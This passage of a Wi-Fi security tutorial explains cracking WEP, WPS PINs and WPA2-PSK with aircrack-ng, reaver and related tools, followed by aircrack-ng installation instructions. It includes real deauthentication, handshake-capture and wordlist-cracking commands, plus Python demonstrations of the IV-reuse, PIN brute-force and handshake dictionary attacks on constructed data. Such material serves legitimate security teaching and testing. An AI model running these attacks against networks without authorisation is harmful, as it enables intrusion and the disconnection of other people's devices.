- The IV is chosen per packet (ideally at random) and transmitted unencrypted.
- The IV is only 24 bits, so there are just 2^24 (about 16.7 million) possible values.

The catch is that IVs repeat on a busy network, and this is the vulnerability we exploit. Two packets with the same IV share a keystream, so XORing their ciphertexts cancels the keystream and leaks the XOR of the plaintexts; any known plaintext (such as the fixed LLC/SNAP header) then reveals keystream bytes. With enough IVs collected, aircrack-ng's statistical attacks (PTW, FMS/KoreK) recover the shared key itself.

We first need to capture a large number of packets so that we collect enough IVs, and store them in a file. If the network is not busy this takes time (aireplay-ng's ARP replay attack can be used to generate traffic). We then run aircrack-ng over the captured IVs to crack the key.

To have aircrack-ng conduct a WEP key attack on a capture file, pass it the
filename, either in .ivs or .cap/.pcap format.

aircrack-ng filename.pcap
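The IV-reuse flaw described above, as an added example that is not part of this page or of the aircrack-ng code base. It implements RC4 and WEP's IV || key seeding, encrypts two constructed frames under the same IV, and shows that the XOR of the ciphertexts cancels the keystream and that the known LLC/SNAP header (or any other known plaintext) hands back keystream bytes that decrypt the other frame. The key, IV and frame contents are constructed for the demo; the CRC-32 ICV of a real WEP frame is omitted.

```python
# Added example, not from the page or from aircrack-ng: why a repeated WEP IV is
# fatal. WEP seeds RC4 with IV || shared key and sends the IV in the clear, so two
# packets under the same IV share a keystream. Key, IV and packet contents are
# constructed for the demo; a real frame also carries a CRC-32 ICV (omitted).


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Plain RC4: key scheduling (KSA) followed by `length` bytes of PRGA output."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    """Byte-wise XOR, truncated to the shorter input."""
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(shared_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """WEP encryption: RC4(IV || key) XOR plaintext. The IV is sent unencrypted."""
    assert len(iv) == 3 and len(shared_key) in (5, 13), "24-bit IV, 40/104-bit key"
    return xor(rc4_keystream(iv + shared_key, len(plaintext)), plaintext)


# Constructed demo material. Both frames start with the fixed LLC/SNAP header that
# every IPv4-over-802.11 frame carries, which is exactly the known plaintext an
# attacker relies on.
SHARED_KEY = bytes.fromhex("0102030405")          # 40-bit shared key (constructed)
IV = bytes.fromhex("000001")                       # 24-bit IV reused by a buggy card
LLC_SNAP_IP = bytes.fromhex("aaaa030000000800")    # real LLC/SNAP header for IPv4
PKT1 = LLC_SNAP_IP + b"client-says-hello-with-padding-bytes"
PKT2 = LLC_SNAP_IP + b"GET /secret HTTP/1.1"
CT1 = wep_encrypt(SHARED_KEY, IV, PKT1)
CT2 = wep_encrypt(SHARED_KEY, IV, PKT2)


def plaintext_xor(ct_a: bytes, ct_b: bytes) -> bytes:
    """Same IV => same keystream, so C1 XOR C2 == P1 XOR P2; the key cancels out."""
    return xor(ct_a, ct_b)


def keystream_from_known_plaintext(known_pt: bytes, ct: bytes) -> bytes:
    """Any known plaintext prefix reveals that many keystream bytes for this IV."""
    return xor(known_pt, ct)


def decrypt_second_packet() -> bytes:
    """Recover PKT2 without ever learning the key: keystream leaked by PKT1 decrypts PKT2."""
    ks = keystream_from_known_plaintext(PKT1, CT1)
    return xor(ks[: len(CT2)], CT2)
```

Collecting IVs with airodump-ng and running aircrack-ng on the .ivs/.cap file is the real-world version of this: the statistical attacks extend the same keystream leakage across tens of thousands of IVs to recover the shared key rather than just one packet.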

Cracking WPA/WPA2
Wi-Fi Protected Access 2 - Pre-Shared Key (WPA2-PSK) secures a network with a shared passphrase rather than per-user credentials; it is designed for home and small-office use, not for enterprise networks (which use 802.1X). The passphrase is 8 to 63 printable characters. The passphrase and the network SSID are hashed into a Pairwise Master Key, and from the PMK a fresh session key is derived for every client connection using nonces exchanged in the 4-way handshake. Session keys are therefore never reused and cannot be read off the air, so unlike WEP there is no statistical shortcut: attacking WPA/WPA2-PSK comes down to guessing the passphrase.

There are two popular methods used to crack WPA/WPA2.

WPS method

WPS (Wi-Fi Protected Setup) is a feature that can be used with WPA and WPA2. It lets clients join the network without typing the passphrase: instead they authenticate with an 8-digit PIN, after which the AP hands them the WPA passphrase. Many routers ship with WPS enabled by default and have a dedicated WPS button. The feature can be disabled on the router's configuration page, but unfortunately most people never do.

The PIN method bypasses the passphrase entirely. An 8-digit PIN has a small keyspace to begin with, and the protocol makes it far smaller: the last digit is a checksum of the first seven, and the AP verifies the PIN in two halves, telling the connecting device whether the first four digits were correct before the remaining digits are checked. That reduces the search from 10^8 combinations to at most 10^4 + 10^3 = 11,000 attempts, which is what reaver exploits.
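An added example (not from the page, reaver or wash) of the arithmetic behind the PIN attack that reaver automates in the earlier wash/reaver section and that is described here: the PIN checksum digit, the half-by-half verification, and the resulting 11,000-attempt worst case. FakeRegistrar is a constructed stand-in for the AP's WPS registrar, not real protocol traffic; its locked flag models the "WPS Locked: Yes" column that wash reports. PIN 12345670 is the well-known default PIN.

```python
# Added example, not from the page, reaver or wash: why an 8-digit WPS PIN falls
# in at most 11,000 guesses. The checksum rule and the half-by-half verification
# are those of the WPS 1.0 PIN method; FakeRegistrar is a constructed stand-in
# for the AP (no real protocol messages are exchanged).


def wps_checksum(first7: int) -> int:
    """Eighth PIN digit: odd positions weighted 3, even positions weighted 1."""
    digits = [int(d) for d in f"{first7:07d}"]
    acc = 3 * sum(digits[0::2]) + sum(digits[1::2])
    return (10 - acc % 10) % 10


def is_valid_pin(pin: str) -> bool:
    """True when the PIN is 8 digits and its last digit is the correct checksum."""
    return len(pin) == 8 and pin.isdigit() and wps_checksum(int(pin[:7])) == int(pin[7])


class FakeRegistrar:
    """Models an AP that answers PIN attempts the way WPS 1.0 does: it reveals
    whether the first half matched before the second half is ever checked.
    A locked AP (wash: 'WPS Locked: Yes') refuses every attempt."""

    def __init__(self, pin: str, locked: bool = False):
        assert is_valid_pin(pin)
        self.pin, self.locked, self.attempts = pin, locked, 0

    def try_pin(self, pin: str):
        """Returns (first half correct, whole PIN correct)."""
        if self.locked:
            raise PermissionError("WPS locked: the PIN attack cannot proceed")
        self.attempts += 1
        first_ok = pin[:4] == self.pin[:4]
        second_ok = first_ok and pin[4:] == self.pin[4:]
        return first_ok, second_ok


def brute_force_pin(ap: FakeRegistrar) -> str:
    """Worst case 10**4 + 10**3 = 11,000 attempts instead of 10**8."""
    first_half = None
    for a in range(10_000):                        # phase 1: first four digits
        if ap.try_pin(f"{a:04d}0000")[0]:
            first_half = f"{a:04d}"
            break
    if first_half is None:
        raise RuntimeError("no first half matched")
    for b in range(1_000):                         # phase 2: three digits + checksum
        first7 = int(first_half + f"{b:03d}")
        candidate = f"{first7:07d}{wps_checksum(first7)}"
        if ap.try_pin(candidate)[1]:
            return candidate
    raise RuntimeError("no PIN matched")
```

A real AP with WPS 1.0 and no rate limiting behaves like FakeRegistrar; one that locks after a few failures is what makes wash's WPS Locked column the first thing to check before launching reaver.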

Wordlist method

Unlike WEP, WPA/WPA2 data packets contain nothing useful to an attacker. The only packets of interest are the handshake packets: the four EAPOL frames exchanged between the AP and a client when it connects. The handshake doesn't contain any data that directly reveals the key; rather, it lets us verify whether a guessed key is valid or not.

We run the following command to capture the handshake packets:

airodump-ng --bssid 00:11:33:22:44:55 --channel 1 --write wpa_handshake mon0

This writes the capture to wpa_handshake-01.cap (airodump-ng appends a sequence number to the prefix).

To obtain a handshake we need to disconnect a connected client so that we can capture the connection being re-established:

aireplay-ng -0 1 -a B6:14:6C:7E:40:9D -c 00:0F:B5:AE:CE:9D mon0

- -0 selects the deauthentication attack, and 1 is the number of deauthentication bursts to send (0 would send them indefinitely).
- -a B6:14:6C:7E:40:9D is the MAC address of the access point.
- -c 00:0F:B5:AE:CE:9D is the MAC address of the client to deauthenticate.
- mon0 is the monitor-mode interface name.

Finally, we use the handshake to verify our guesses. We create a wordlist and/or download a popular one from the Internet such as rockyou.txt. This method is known as a dictionary attack: if the wordlist contains the password, aircrack-ng outputs it.

aircrack-ng -w rockyou.txt wpa_handshake-01.cap
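Added example, not from the page or from aircrack-ng: the computation a wordlist attack on a captured 4-way handshake actually performs, serving both the PBKDF2/PMK description in the earlier aircrack-ng section and the dictionary attack here. For each candidate it derives PMK = PBKDF2-HMAC-SHA1(passphrase, SSID), the PTK via the 802.11 PRF from the two MAC addresses and nonces, and recomputes the MIC over EAPOL message 2 with the KCK (first 128 bits of the PTK). SSID, MAC addresses, nonces and the "captured" message 2 are constructed (simulate_capture plays the client with the real passphrase); the password/IEEE PMK test vector is the one from IEEE 802.11i.

```python
# Added example, not from the page or aircrack-ng: dictionary attack against a
# WPA2-PSK 4-way handshake. Everything below the imports is constructed demo
# material except the algorithms (PBKDF2 -> PMK, PRF -> PTK, HMAC-SHA1-128 MIC).
import hashlib
import hmac
from typing import Iterable, Optional

SSID = "DemoNet"                                  # constructed
AA = bytes.fromhex("001122334455")                # AP (authenticator) MAC, constructed
SPA = bytes.fromhex("66778899aabb")               # client (supplicant) MAC, constructed
ANONCE = bytes(range(32))                         # constructed nonces
SNONCE = bytes(range(32, 64))
# 802.1X header (4) + descriptor type (1) + key info (2) + key length (2)
# + replay counter (8) + nonce (32) + key IV (16) + RSC (8) + key ID (8) = 81
MIC_OFFSET = 81


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """WPA-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """IEEE 802.11 PRF-n: HMAC-SHA1(key, label || 0x00 || data || counter), concatenated."""
    out = b""
    for i in range((nbytes + 19) // 20):
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:nbytes]


def derive_kck(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF(PMK, "Pairwise key expansion", min/max of MACs and nonces); KCK = PTK[0:16]."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 48)[:16]


def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    """Key descriptor version 2 (WPA2/CCMP): HMAC-SHA1 over the frame with the MIC
    field zeroed, truncated to 128 bits. (WPA/TKIP, version 1, uses HMAC-MD5.)"""
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * 16 + eapol[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_eapol_msg2(snonce: bytes, mic: bytes = b"\x00" * 16) -> bytes:
    """Message 2 of the handshake; key info 0x010A = version 2, pairwise, MIC present."""
    body = (b"\x02" + (0x010A).to_bytes(2, "big") + (16).to_bytes(2, "big")
            + (1).to_bytes(8, "big") + snonce + b"\x00" * 16 + b"\x00" * 8
            + b"\x00" * 8 + mic + (0).to_bytes(2, "big"))
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body


def simulate_capture(true_passphrase: str) -> dict:
    """Stand-in for what airodump-ng writes: the client signs message 2 with the real KCK."""
    kck = derive_kck(pmk_from_passphrase(true_passphrase, SSID), AA, SPA, ANONCE, SNONCE)
    mic = eapol_mic(kck, build_eapol_msg2(SNONCE))
    return {"ssid": SSID, "aa": AA, "spa": SPA, "anonce": ANONCE, "snonce": SNONCE,
            "eapol": build_eapol_msg2(SNONCE, mic), "mic": mic}


def crack(capture: dict, wordlist: Iterable[str]) -> Optional[str]:
    """Dictionary attack: recompute the MIC under each candidate and compare."""
    for candidate in wordlist:
        candidate = candidate.rstrip("\r\n")
        if not 8 <= len(candidate) <= 63:          # not a legal WPA-PSK passphrase, skip
            continue
        kck = derive_kck(pmk_from_passphrase(candidate, capture["ssid"]),
                         capture["aa"], capture["spa"], capture["anonce"], capture["snonce"])
        if hmac.compare_digest(eapol_mic(kck, capture["eapol"]), capture["mic"]):
            return candidate
    return None
```

The 4096-iteration PBKDF2 is the whole cost of the attack and the reason it cannot be sped up beyond trying candidates faster: nothing in the capture shortcuts it, which is why wordlist quality matters more than anything else.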



Installing Aircrack-ng from Source


Legacy information can be found here.

Requirements
- Autoconf
- Automake
- Libtool
- shtool
- OpenSSL development package or libgcrypt development package.
- pkg-config
Linux
- Airmon-ng requires ethtool and rfkill
- If USB bus is present, lsusb
- If PCI/PCIe bus is present, lspci
- LibNetlink 1 (libnl-dev) or 3 (libnl-3-dev and libnl-genl-3-dev) development packages. It can be disabled by passing --disable-libnl to configure.
- Kernel headers and gcc as well as make have to be installed on your system (build-essential on Debian based distributions)
- make and Standard C++ Library development package (Debian: libstdc++-dev)
Windows (Cygwin)
- w32api is required
- if using clang, libiconv and libiconv-devel
- make and Standard C++ Library development package
MacOS
Install the following via Homebrew (brew):

- autoconf
- automake
- libtool
- openssl
- shtool
- pkg-config
- hwloc
- pcre
- sqlite3
- libpcap
- cmocka (optional)
FreeBSD, OpenBSD, NetBSD, Solaris
Install the following via pkg:

- gmake
- pkgconf
- pcre
- sqlite3
- gcc9 (or better)
Optional stuff
- If you want SSID filtering with regular expressions in airodump-ng (--essid-regex), the pcre development package is required.
- If you want to use airolib-ng and the '-r' option in aircrack-ng, SQLite development package >= 3.3.17 (3.6.X version or better is recommended)
- If you want to use Airpcap, the 'developer' directory from the CD is required. It can be downloaded here.
- For best performance on FreeBSD (50-70% more), install gcc5 via: pkg install gcc5
  Then compile with: gmake CC=gcc5 CXX=g++5
- rfkill
- CMocka
- hwloc: strongly recommended, especially on high core count systems where it may give a serious performance boost
Compiling and installing
Notes:

- On OS X, *BSD and Solaris, use 'gmake' instead of 'make'.
- In order to compile with clang instead of gcc, add 'CC=clang CXX=clang++' to the configure command.
Current version

wget https://download.aircrack-ng.org/aircrack-ng-1.7.tar.gz

tar -zxvf aircrack-ng-1.7.tar.gz

cd aircrack-ng-1.7

autoreconf -i

./configure --with-experimental

make

make install

ldconfig
Compiling with AirPcap support (cygwin only)
1. Copy the 'developer' directory from the AirPcap CD to the same level as the 'Aircrack-ng' directory
2. Append the '--with-airpcap=../developer' parameter to configure:
Compiling on *BSD
Commands are exactly the same as Linux but instead of make, use gmake (with CC=gcc5 CXX=g++5 or any more recent gcc version installed).

Compiling on MacOS
Commands are exactly the same as Linux

Latest Git (development) Sources


Note: Compilation parameters can also be used with the sources from our git repository.

git clone https://github.com/aircrack-ng/aircrack-ng

cd aircrack-ng

autoreconf -i

./configure --with-experimental

make

make install

ldconfig

./configure flags
When configuring, the following flags can be used and combined to adjust the suite to your choosing:

- --with-airpcap=DIR: needed for supporting airpcap devices on windows (cygwin or msys2 only). Replace DIR above with the absolute location to the root of the extracted source code from the Airpcap CD or downloaded SDK available online. Required on Windows to build besside-ng, besside-ng-crawler, easside-ng, tkiptun-ng and wesside-ng when building experimental tools. The developer pack (compatible with version 4.1.1 and 4.1.3) can be downloaded at https://support.riverbed.com/content/support/software/steelcentral-npm/airpcap.html
- --with-experimental: needed to compile tkiptun-ng, easside-ng, buddy-ng, buddy-ng-crawler, airventriloquist and wesside-ng. The libpcap development package is also required to compile most of the tools. If not present, not all experimental tools will be built. On Cygwin, libpcap is not present and the Airpcap SDK replaces it. See the --with-airpcap option above. On Debian based distros, install libpcap-dev
- --with-ext-scripts: needed to build airoscript-ng, versuck-ng, airgraph-ng and airdrop-ng. Note: each script has its own dependencies. Note: it's only required in the install phase.
- --with-gcrypt: use the libgcrypt crypto library instead of the default OpenSSL, and also use the internal fast sha1 implementation (borrowed from GIT). Dependency (Debian): libgcrypt20-dev
- --with-duma: compile with DUMA support. DUMA is a library to detect buffer overruns and under-runs. Dependencies (Debian): duma
- --with-xcode: set this flag to true to compile on OS X with Xcode 7+.
- --disable-libnl: set up the project to be compiled without libnl (1 or 3). Linux option only.
- --without-opt: do not enable stack protector (on GCC 4.9 and above).
- --enable-shared: make OSdep a shared library.
- --disable-shared: when combined with --enable-static, it will statically compile Aircrack-ng.
- --with-avx512: on x86, add support for AVX512 instructions in aircrack-ng. Only use it when the current CPU supports AVX512.
- --with-static-simd=: compile a single optimization into the aircrack-ng binary. Useful when compiling statically and/or for space-constrained devices. Valid SIMD options: x86-sse2, x86-avx, x86-avx2, x86-avx512, ppc-altivec, ppc-power8, arm-neon, arm-asimd. Must be used with --enable-static --disable-shared. When using those 2 options, the default is to compile the generic optimization into the binary; --with-static-simd merely allows choosing another one.
- --enable-maintainer-mode: it is important to enable this flag when developing with Aircrack-ng. This flag enables additional compile warnings and safety features.
Troubleshooting Tips
error while loading shared libraries: libaircrack-ng.so.0
Run ldconfig as root or with “sudo” to solve the issue.

"command not found" error message


After you do "make install" and then try to use any of the Aircrack-ng suite commands, you get the error message "command not found" or similar. Your system looks for the Aircrack-ng commands in the directories listed in the PATH environment variable.

Normally, the Aircrack-ng suite programs and man pages are placed in:

/usr/local/bin

/usr/local/sbin

/usr/local/man

On your system, to determine which directories have the Aircrack-ng programs enter the following. If
using “locate” be sure to first run “updatedb”.

locate aircrack-ng
locate airmon-ng

or

find / -name aircrack-ng

find / -name airmon-ng

Once you know the directories (exclude the source directories) then determine which directories are
in your PATH. To see which directories are included in PATH on your particular system enter:

echo $PATH

It should show something like:

/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

At this point compare the actual locations with the directories in your PATH. If the directories are
missing from your PATH then you have a few options:

- Add the directories to your PATH. See one or more of the following web sites for details of how to do this:
  https://www.cyberciti.biz/faq/howto-print-path-variable/
  http://www.troubleshooters.com/linux/prepostpath.htm
- Change to the particular directory with "cd" and then run the commands from within the directory. Don't forget to add "./" in front of each command.
- Specify the full path for each command. So if Aircrack-ng is located in the "/usr/local/bin" directory then run the command as "/usr/local/bin/aircrack-ng".
Installing pre-compiled binaries
Linux/BSD/OSX
Except on Linux penetration-testing distributions and MacOS, distribution packages are usually out of date. In that case, uninstalling the package and installing from source is the recommended way to go.

We offer packages (statically compiled binaries) for any distribution that supports .deb or .rpm packages thanks to PackageCloud.io, so you can use your distro's package manager to install and keep Aircrack-ng up to date:
- Debian
- Ubuntu
- Mint
- SLES
- OpenSuse
- Fedora
- RHEL
- CentOS
- Amazon Linux
- Elementary OS
While most folks want to use our "release" packages, "git" packages are available too for those who decide to use bleeding edge.

More details about them can be found in our blog post.

On MacOS, install it via MacPorts or brew. Simply do "brew install aircrack-ng" or "sudo port install aircrack-ng".

Windows
The Windows version of the Aircrack-ng suite does not have an install program. You must manually
install (unzipping archive) the software.

Here are the steps to follow for Windows:

- Download the latest version of the Aircrack-ng suite for Windows to your computer. The link for the zip file can be found on the Wiki home page.
- Unzip the contents of the Aircrack-ng zip file into "C:\". This will create a directory called "aircrack-ng-1.6-win". This directory name will vary based on the exact version that you downloaded. This main directory contains three subdirectories - "bin", "src" and "test".
Prior to using the software, make sure to install the drivers for your particular wireless card. See
this link for the instructions. We currently only support Airpcap; other adapters may be supported but
require development of your own DLL so the different tools can interact with it.

To now use the Aircrack-ng suite, start Windows Explorer and double click on Aircrack-
ng GUI.exe inside “bin” subdirectory. The GUI requires .NET version 4.6.1 to run.

Alternatively, open a command prompt (Start menu → Execute → cmd.exe) and change to the “C:\
aircrack-ng-1.6-win\bin” directory and execute the individual commands.

Important notes:

- Airmon-ng is a Linux/FreeBSD tool only.
- Remember that Windows only supports a limited subset of the commands.
- Some troubleshooting tips specific to XP and Vista can be found on this page.
